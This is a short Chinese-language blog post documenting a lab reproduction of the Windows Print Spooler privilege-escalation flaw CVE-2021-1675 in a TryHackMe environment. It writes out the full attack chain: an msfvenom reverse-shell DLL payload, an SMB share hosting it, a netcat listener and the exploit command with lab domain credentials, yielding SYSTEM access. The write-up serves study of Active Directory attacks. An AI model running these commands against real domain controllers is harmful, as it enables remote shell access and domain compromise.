Windows Print Spooler (CVE-2021-1675 域提權)
CVE-2021-1675(Windows Print Spooler 域提權) 前言 : 最近在碰 AD 方面各種攻擊手法,也在網路上查查近年爆出的 CVE 漏洞,CVE 編號是 CVE-2021-1675,之後碰到 AD 環境多了一招的概念,趁空閒時復現一下此漏洞。 內容 : 直接利用 Tryhackme 環境(懶的搭了XD 實作環境 : kali : 10.9.1.117 DC : 10.10.15.24 (擁有 noth 域用戶,密碼 1qaz@WSX) kali 產生反連 .dll。 msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.9.1.117 LPORT=443 -f dll -o /tmp/poc.dll SMB 開啟共享。 impacket-smbserver smb /tmp/ 本地 nc 監聽。 nc -lvvp 443 執行 PoC (會報錯,不過好像是正常 ? python3 CVE-2021-1675.py CONTROLLER.local/noth:1qaz@WSX@10.10.15.24 '\\10.9.1.117\smb\shell.dll' 成功取得 System 權限。 實戰中應該會遇到 SMBV1 沒有開啟的問題,再看看要怎麼解決。